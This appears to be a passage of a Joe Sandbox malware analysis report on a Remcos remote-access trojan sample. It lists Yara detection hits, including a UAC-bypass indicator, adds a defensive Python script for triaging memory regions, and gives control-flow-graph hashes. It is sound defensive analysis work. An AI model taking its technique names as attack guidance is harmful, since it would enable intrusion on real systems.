                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows executables potentially bypassing UAC using eventvwr.exe, Source: 0000001C.00000000.598510412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001C.00000000.598510412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001C.00000000.606949507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows executables potentially bypassing UAC using eventvwr.exe, Source: 0000001C.00000000.606949507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001C.00000000.606949507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001C.00000000.603526142.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows executables potentially bypassing UAC using eventvwr.exe, Source: 0000001C.00000000.603526142.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001C.00000000.603526142.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001C.00000000.599641579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows executables potentially bypassing UAC using eventvwr.exe, Source: 0000001C.00000000.599641579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001C.00000000.599641579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001C.00000000.599125899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows executables potentially bypassing UAC using eventvwr.exe, Source: 0000001C.00000000.599125899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001C.00000000.599125899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001C.00000002.608522925.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001C.00000000.606295959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows executables potentially bypassing UAC using eventvwr.exe, Source: 0000001C.00000000.606295959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001C.00000000.606295959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                    Reputation:high
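
                                                                    Every Yara match listed above is reported against a memory dump of target 28 (0x1C in the dump name), and the Remcos signatures all hit the region at 0x400000, whose protection field in the dump name reads 0x40. The Python script below is an added example, not part of the Joe Sandbox report: it parses these bullet lines, decodes the dump name, and groups the hits per memory region so that hits inside writable-and-executable memory stand out during triage. The field layout assumed for the dump name (target id, snapshot index, sequence key, base address, page protection, three undecoded flag fields) is inferred from the values on this page and is an assumption; the Win32 page-protection constants are standard. The embedded input is five bullets taken from the list above.

```python
"""Group Joe Sandbox 'Yara matches' bullets per memory region and decode the
dump name, so hits in writable-and-executable (RWX) memory stand out."""
import re
from collections import defaultdict

# Win32 page-protection constants (memoryapi.h); these values are standard.
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXECUTABLE = {0x10, 0x20, 0x40, 0x80}
WRITABLE = {0x04, 0x08, 0x40, 0x80}

# One bullet of the report's "Yara matches" list; description is taken up to ", Source:".
MATCH_RE = re.compile(
    r"Rule:\s*(?P<rule>[^,]+),\s*Description:\s*(?P<desc>.*?),\s*"
    r"Source:\s*(?P<source>[0-9A-Fa-f.]+\.sdmp),\s*Author:\s*(?P<author>.+?)\s*$"
)

# Five bullets taken from the Yara matches list of target 28 (InstallUtil.exe) above.
REPORT_LINES = [
    "• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001C.00000000.601490372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security",
    "• Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows executables potentially bypassing UAC using eventvwr.exe, Source: 0000001C.00000000.601490372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen",
    "• Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001C.00000000.601490372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown",
    "• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001C.00000002.607934228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security",
    "• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001C.00000002.608522925.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security",
]


def parse_source(source):
    """Decode a dump name such as
    0000001C.00000000.601490372.0000000000400000.00000040.00000400.00020000.00000000.sdmp
    The field layout is an assumption inferred from this report (0x1C is Target ID 28,
    0x400000 is where the Remcos image was found). Three flag fields are kept raw."""
    parts = source.split(".")
    if len(parts) != 9 or parts[-1] != "sdmp":
        raise ValueError("unexpected dump name: %s" % source)
    protect = int(parts[4], 16) & 0xFF      # drop modifiers such as PAGE_GUARD (0x100)
    return {
        "target_id": int(parts[0], 16),     # matches the report's "Target ID"
        "snapshot": int(parts[1], 16),      # assumption: snapshot index
        "sequence": parts[2],               # assumption: dump ordering key, kept raw
        "base": int(parts[3], 16),
        "protect": protect,
        "protect_name": PAGE_PROTECT.get(protect, "0x%02X" % protect),
        "raw_flags": tuple(parts[5:8]),     # undecoded here (0x20000 equals MEM_PRIVATE)
    }


def parse_match_line(line):
    """Return the parsed bullet, or None when the line is not a Yara match."""
    m = MATCH_RE.search(line)
    if m is None:
        return None
    hit = parse_source(m.group("source"))
    hit.update(source=m.group("source"), rule=m.group("rule").strip(),
               description=m.group("desc").strip(), author=m.group("author").strip())
    return hit


def group_by_region(lines):
    """Key hits by (target id, base address). The same region is dumped more than
    once (different snapshot/sequence), so rules, dumps and protections are sets."""
    regions = defaultdict(lambda: {"rules": set(), "dumps": set(), "protects": set()})
    for line in lines:
        hit = parse_match_line(line)
        if hit is None:
            continue
        region = regions[(hit["target_id"], hit["base"])]
        region["rules"].add(hit["rule"])
        region["dumps"].add(hit["source"])
        region["protects"].add(hit["protect"])
    return dict(regions)


def rwx_regions(regions):
    """Regions with a signature hit that were writable and executable when dumped.
    A legitimately mapped image is not RWX, so these are the first regions to pull."""
    found = []
    for (target_id, base), region in sorted(regions.items()):
        if any(p in EXECUTABLE and p in WRITABLE for p in region["protects"]):
            found.append({"target_id": target_id, "base": base,
                          "rules": sorted(region["rules"]),
                          "dump_count": len(region["dumps"])})
    return found


def report(lines):
    """One human-readable line per region, for the console."""
    out = []
    for (target_id, base), region in sorted(group_by_region(lines).items()):
        names = ", ".join(sorted(PAGE_PROTECT.get(p, "0x%02X" % p) for p in region["protects"]))
        out.append("target %d base 0x%X [%s] %d dump(s): %s" % (
            target_id, base, names, len(region["dumps"]), ", ".join(sorted(region["rules"]))))
    return out


if __name__ == "__main__":
    print("\n".join(report(REPORT_LINES)))
    for r in rwx_regions(group_by_region(REPORT_LINES)):
        print("RWX region with RAT signature: target %d base 0x%X" % (r["target_id"], r["base"]))
```

                                                                    Run against the five embedded bullets, the script yields two regions for target 28: 0x400000 (PAGE_EXECUTE_READWRITE, two dumps, all three rules) and 0xB37000 (PAGE_READWRITE, one dump, JoeSecurity_Remcos only); only the former is reported as RWX. Feeding it the complete list above gives the same two regions with more dumps behind the first.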


                                                                      Execution Graph

                                                                      Execution Coverage:2.8%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:4
                                                                      Total number of Limit Nodes:0
                                                                      Execution graph (4 nodes; interactive rendering omitted): entry 0x241d128 leads to 0x241d13c, which branches either to 0x241d170, where DrawEdge is called, or directly to 0x241d199; the DrawEdge block continues to 0x241d199.

                                                                      Control-flow Graph

                                                                      Function at 0x24ada50 (basic blocks from 0x24ada50 to 0x24ae388); no API calls or string references resolved. The executed/not-executed colouring and the edge list of the interactive graph are omitted.
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.539934560.00000000024A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_kyFBQxVbsg.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0f4ab13b398802dfbaa522d267c1e1df857275451fd94292c62e9116246ea982
                                                                      • Instruction ID: acaeb25682044b1963e0cdcab78cc5940c55849e8961778ba153bd406f84af2b
                                                                      • Opcode Fuzzy Hash: 0f4ab13b398802dfbaa522d267c1e1df857275451fd94292c62e9116246ea982
                                                                      • Instruction Fuzzy Hash: C8523875A00514DFDB14DFA8C994E99BBB2FF48304F1681A9E50AAB366CB31EC91CF50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      Function at 0x24aeab8 (basic blocks from 0x24aeab8 to 0x24af47d); no API calls or string references resolved. Interactive graph rendering omitted.
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.539934560.00000000024A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_kyFBQxVbsg.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1f0105c34f170007ff7f51ef829d223db57905585d40499d0571457f2d7de48f
                                                                      • Instruction ID: 5c5267c3bbe0cee569d85119d7dbc91ecd33be018109f7312a4b990887b449b4
                                                                      • Opcode Fuzzy Hash: 1f0105c34f170007ff7f51ef829d223db57905585d40499d0571457f2d7de48f
                                                                      • Instruction Fuzzy Hash: 3632B275A00119EFDB10DF68D894AAEB7F2FF88304F258669D415A7758CB38AD42CF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      Function at 0x241d128 (basic blocks from 0x241d128 to 0x241d1ec); the block at 0x241d170 calls DrawEdge. APIs: DrawEdge. Interactive graph rendering omitted.
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.539725435.000000000241D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0241D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_241d000_kyFBQxVbsg.jbxd
                                                                      Similarity
                                                                      • API ID: DrawEdge
                                                                      • String ID:
                                                                      • API String ID: 3475542296-0
                                                                      • Opcode ID: b5e724f7ee9e718fe9e6337e61d37b307b72693c58119e257fade63c1ae2a5f6
                                                                      • Instruction ID: e47a01a1e0d0ac67c70dbe410d4483bd55d3050236081d5fc70f5c7513f02c43
                                                                      • Opcode Fuzzy Hash: b5e724f7ee9e718fe9e6337e61d37b307b72693c58119e257fade63c1ae2a5f6
                                                                      • Instruction Fuzzy Hash: CE216AF5A08344DFDB06DF14D9C0B2BBBA5FB88324F24C66AD8494B345C335D886C6A1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      Function entered at 0x241d123, with the same block structure as the graph at 0x241d128 above (basic blocks to 0x241d1ec); the block at 0x241d170 calls DrawEdge. APIs: DrawEdge. Interactive graph rendering omitted.
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.539725435.000000000241D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0241D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_241d000_kyFBQxVbsg.jbxd
                                                                      Similarity
                                                                      • API ID: DrawEdge
                                                                      • String ID:
                                                                      • API String ID: 3475542296-0
                                                                      • Opcode ID: 873b283815ee34473f199baa2ef1f0876f93bd05d728716d466cf19375efbb41
                                                                      • Instruction ID: a6f0c14306bad9b88dc2fae9620d9ed3d45a0ce312c264caf4b7ae313ddd72ad
                                                                      • Opcode Fuzzy Hash: 873b283815ee34473f199baa2ef1f0876f93bd05d728716d466cf19375efbb41
                                                                      • Instruction Fuzzy Hash: 9411CAB5904680CFDB12CF14D5C4B56FB71FB88324F24C6AAD84547746C339D54ACB51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      Function at 0x24a0468 (basic blocks from 0x24a0468 to 0x24a05d2); the call at 0x24a04ab resolves to 0x24a0600 or 0x24a05f0. Strings: tgl. Interactive graph rendering omitted.
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.539934560.00000000024A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_kyFBQxVbsg.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: tgl
                                                                      • API String ID: 0-1843027430
                                                                      • Opcode ID: 877f3126530e9bb571da77f40f418011affb9ea0b66b2d97390fc9b95d9b0ac6
                                                                      • Instruction ID: 6968b5ceb40533a0c8851c9c96838c908ed79978ea37882e933f21611e5f0787
                                                                      • Opcode Fuzzy Hash: 877f3126530e9bb571da77f40f418011affb9ea0b66b2d97390fc9b95d9b0ac6
                                                                      • Instruction Fuzzy Hash: 1441F570D00219CFDB24DFA8D4546EEBBB2BF69304F20952AD405BB350DB74998ACF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      Function at 0x24a07d0 (basic blocks from 0x24a07d0 to 0x24a08ec); the final block at 0x24a08ec branches back to itself. Interactive graph rendering omitted.
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.539934560.00000000024A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_kyFBQxVbsg.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9f15906938fa7a019cfb0fe7c0ba13ff5e7a24dd5683ef854dc5f8a29de354f6
                                                                      • Instruction ID: 07eb688a50ba2b284b0890adc729c252497d9b158c81a4bd9d8e3a1fbe68641e
                                                                      • Opcode Fuzzy Hash: 9f15906938fa7a019cfb0fe7c0ba13ff5e7a24dd5683ef854dc5f8a29de354f6
                                                                      • Instruction Fuzzy Hash: A1311D70D06208DBDB18CFA9D5506EEB7B2BF99304F10A52AD405BB354DB709942CB98
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      Function entered at 0x24a07e0, with the same block structure as the graph at 0x24a07d0 above (basic blocks to 0x24a08ec); the final block at 0x24a08ec branches back to itself. Interactive graph rendering omitted.
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.539934560.00000000024A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_kyFBQxVbsg.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 87c82bc873ac743ff8425c19043e47a93b88b581a5cd4213da7aebe2ee6cb62c
                                                                      • Instruction ID: f135a236f39a5f1909d2e9a269391aa5baa905df5325b84b152207ea9728de77
                                                                      • Opcode Fuzzy Hash: 87c82bc873ac743ff8425c19043e47a93b88b581a5cd4213da7aebe2ee6cb62c
                                                                      • Instruction Fuzzy Hash: AF312970E06208DFDB18CFE9D560AEEBBB2BF99304F10A52AD405B7354DB705842CB98
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      Function at 0x24a0600 (basic blocks from 0x24a0600 to 0x24a071b); the call at 0x24a0635 resolves to 0x24a0748 or 0x24a0758. Interactive graph rendering omitted.
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.539934560.00000000024A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_kyFBQxVbsg.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1c080d8bb34dba1ba6d57c3666e7d7a51cf030eb717ba3e1809e9ffb52f6fef9
                                                                      • Instruction ID: 68ef4d159558e72381512ed13f81b7f4e2eb2153ffe4c5aac24702af0b685325
                                                                      • Opcode Fuzzy Hash: 1c080d8bb34dba1ba6d57c3666e7d7a51cf030eb717ba3e1809e9ffb52f6fef9
                                                                      • Instruction Fuzzy Hash: CF31D274D00219CFDB14DFA8C455AEEBBB1FF59308F10952AD806AB354DB74994ACF60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      Function entered at 0x24a05f0, with the same block structure as the graph at 0x24a0600 above (basic blocks to 0x24a071b); the call at 0x24a0635 resolves to 0x24a0748 or 0x24a0758. Interactive graph rendering omitted.
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.539934560.00000000024A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_kyFBQxVbsg.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7baffa852a364cca7bbb59f9dcc909639860ce3589d8d6762496f45c02b2ee8a
                                                                      • Instruction ID: b7e9d6210f264ceef44270a244c561ebad4b57c220ee502bcba635e37dda7a5f
                                                                      • Opcode Fuzzy Hash: 7baffa852a364cca7bbb59f9dcc909639860ce3589d8d6762496f45c02b2ee8a
                                                                      • Instruction Fuzzy Hash: F52165B4D0020C8FDB14CFA8C455BEEBBB2EF99308F10852AD806AB354DB74584ACF50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      Function at 0x24a0748 (basic blocks from 0x24a0748 to 0x24a07cf); the call at 0x24a07b7 resolves to 0x24a07d0 or 0x24a07e0. Interactive graph rendering omitted.
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.539934560.00000000024A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_kyFBQxVbsg.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 01dd26ac29705e0273e30610575b12f81649036b77b9d49adbbedf1db0b82899
                                                                      • Instruction ID: 890af67a3af651fc7388445932988a2ba3199ce37006b98e830ec61cc1761a43
                                                                      • Opcode Fuzzy Hash: 01dd26ac29705e0273e30610575b12f81649036b77b9d49adbbedf1db0b82899
                                                                      • Instruction Fuzzy Hash: 2D1117B4D09208DFCB44DFA9D5446AEBBF2FF59304F1085AAD516A7350EB305A41CF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

Control-flow Graph

Control-flow graph (rendered graph omitted): basic blocks 24a0758-24a0770, 24a0772, 24a0777-24a07b4, 24a07bd-24a07cf; calls at 24a07b7 to 24a07d0 and 24a07e0
Memory Dump Source
• Source File: 00000000.00000002.539934560.00000000024A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24a0000_kyFBQxVbsg.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a88b9265c09f879aaf03c8b977347e1d86c8529debe3109c0025e6dd9e38a52d
• Instruction ID: 30ebbba0a91d549690d3c2a3982cbcb377e3e52234b1a193c9578fdaf0d81052
• Opcode Fuzzy Hash: a88b9265c09f879aaf03c8b977347e1d86c8529debe3109c0025e6dd9e38a52d
• Instruction Fuzzy Hash: 4701A5B4D05208DFCB44DFE9D5446AEBBF5FB48304F1085AAD515A7350EB305A41CF91
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

Control-flow graph (rendered graph omitted): basic blocks 24ae640-24ae655, 24ae657-24ae663, 24ae66b, 24ae676-24ae688, 24ae690-24ae69e; no calls
Memory Dump Source
• Source File: 00000000.00000002.539934560.00000000024A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24a0000_kyFBQxVbsg.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bbfe919db6cc6f6fed246cf4a138b5e5884a25746050a3eb7b1a75f5174c761b
• Instruction ID: a9fd129d1ee9dd2b0623e21ecd8abdde6e6ab9b9cc72b5570a9a5aaa0519cbd6
• Opcode Fuzzy Hash: bbfe919db6cc6f6fed246cf4a138b5e5884a25746050a3eb7b1a75f5174c761b
• Instruction Fuzzy Hash: 8FE02230308020ABD7247BB6E42032E36D3DB85658B8C462EDB0AC3744CF242E424BDB
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

Control-flow graph (rendered graph omitted): basic blocks 24ad740-24ad75b (calls 24ada50), 24ad761-24ad764
Memory Dump Source
• Source File: 00000000.00000002.539934560.00000000024A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24a0000_kyFBQxVbsg.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: abf5163970a2e762982b0a96075e5b776ed979703d6d5f85ec782e6aa3c33ddf
• Instruction ID: e5af5f67b7181f37dc73eaee4338413099d64da775d477dc407a05c655d6f96d
• Opcode Fuzzy Hash: abf5163970a2e762982b0a96075e5b776ed979703d6d5f85ec782e6aa3c33ddf
• Instruction Fuzzy Hash: E6D01375D0610CEF4740DFE4D50055DB7FEDB05104B1141E6DA05D7210EF315F105791
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

Control-flow graph (rendered graph omitted): basic blocks 24a0448-24a0452, 24a0454, 24a0459-24a045a (calls 24a0468), 24a0460-24a0463
Memory Dump Source
• Source File: 00000000.00000002.539934560.00000000024A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24a0000_kyFBQxVbsg.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6af1efaff06d8d86efdb7f7b02169e3f0bde0eaa34dafa5ea799d4c0fa606317
• Instruction ID: c37535ecde41f47e7ccd9ca6380b4335bb643688fe0e3c8707d9087cb1971542
• Opcode Fuzzy Hash: 6af1efaff06d8d86efdb7f7b02169e3f0bde0eaa34dafa5ea799d4c0fa606317
• Instruction Fuzzy Hash: B4C09B304D57058BC53D27D4B41C735B668B70B749F442D55D60D11550D7749470C565
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.539934560.00000000024A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24a0000_kyFBQxVbsg.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5a351d29eca98391dab565d85a3bdf6c268e35e65aa7ebe43f950460027c78c7
• Instruction ID: 8bfa73e64a5686958c436e43fe856081972b1c32708c369753de846fbe7bc372
• Opcode Fuzzy Hash: 5a351d29eca98391dab565d85a3bdf6c268e35e65aa7ebe43f950460027c78c7
• Instruction Fuzzy Hash: 69715E70A041049FD748EF7AE951A8A7BF3EBC8304F18D56AE1059B328DB745A458B91
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000003.00000002.523550158.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_c80000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f5e7ffb19b01796eab2219dd2c812121c346c319cbd52145754e0b4a22babd12
• Instruction ID: 6afa379b6b2c894a41afe3ad172ffb2c6d388e0651d151ba1004d4d22489ac72
• Opcode Fuzzy Hash: f5e7ffb19b01796eab2219dd2c812121c346c319cbd52145754e0b4a22babd12
• Instruction Fuzzy Hash: E1037A34A14168CFDB24DB60D955BAEB7B3FB88300F1185A8E50A6B794CF39AD81DF50
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000003.00000002.523550158.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_c80000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 36188238dbcf88cb7124f21df051417c1b1b5d5dcc9bd5b0e86709727ec2e529
• Instruction ID: 89bd923be2ff97974dbe149d668c3e9ea7c5c92f57d0f5b84abbcb17723e0548
• Opcode Fuzzy Hash: 36188238dbcf88cb7124f21df051417c1b1b5d5dcc9bd5b0e86709727ec2e529
• Instruction Fuzzy Hash: 9E037A34A10168DFDB24DB60D955BAEB7B3FB88300F1185A8E50A6B794CF39AD81DF50
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000003.00000002.523550158.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_c80000_powershell.jbxd
Similarity
• API ID:
• String ID: HJp
• API String ID: 0-3680228313
• Opcode ID: a79541dd69576a4d55241f67a02fd0844a51b3e2503c3d090ac81483d1cd90cd
• Instruction ID: 587bdd01d46b9a4d168458e2d030aa7f8b1c8eca4f96852a7d8ffccdf44b2176
• Opcode Fuzzy Hash: a79541dd69576a4d55241f67a02fd0844a51b3e2503c3d090ac81483d1cd90cd
• Instruction Fuzzy Hash: 20D18E34B012089FDB04DFA4C494BEEBBF2AF99318F148569D405AB395CB75DE86CB90
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000003.00000002.523550158.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_c80000_powershell.jbxd
Similarity
• API ID:
• String ID: HJp
• API String ID: 0-3680228313
• Opcode ID: 635a321050e2ea44327551d33baf4e91daf520f00595196ac941543c24867a18
• Instruction ID: 9c1dfcfe5bb6326574c82cbc99a6be27dc4db087b8ed7ed98b855454e555835b
• Opcode Fuzzy Hash: 635a321050e2ea44327551d33baf4e91daf520f00595196ac941543c24867a18
• Instruction Fuzzy Hash: 6031F234B05A008BDB186734D4B47BE3BA3AFD531DF14852DD4068B794CFB98D168795
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000003.00000002.523550158.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_c80000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a55bbce2ccf374b07b48bf94c4e07c5db56b6086ffa46bfef5b253640d71e6c1
• Instruction ID: d1a43052cfb8c67445558f3e72607792840be37304f9dd48195eff51a2ed30c9
• Opcode Fuzzy Hash: a55bbce2ccf374b07b48bf94c4e07c5db56b6086ffa46bfef5b253640d71e6c1
• Instruction Fuzzy Hash: 17D14834A11208CBD709EB60D461AAE7773EBC9314F519978E5026B7D5CF39AD82CBA0
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000003.00000002.523550158.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_c80000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7a90050626d06475fb4824d1ba384dab0f1d0925182465f45bd68f0ea50cd1c2
• Instruction ID: 505eecb196600af93004115d6d1ca08df6e32afad3786bae214d2d0f2f09ea32
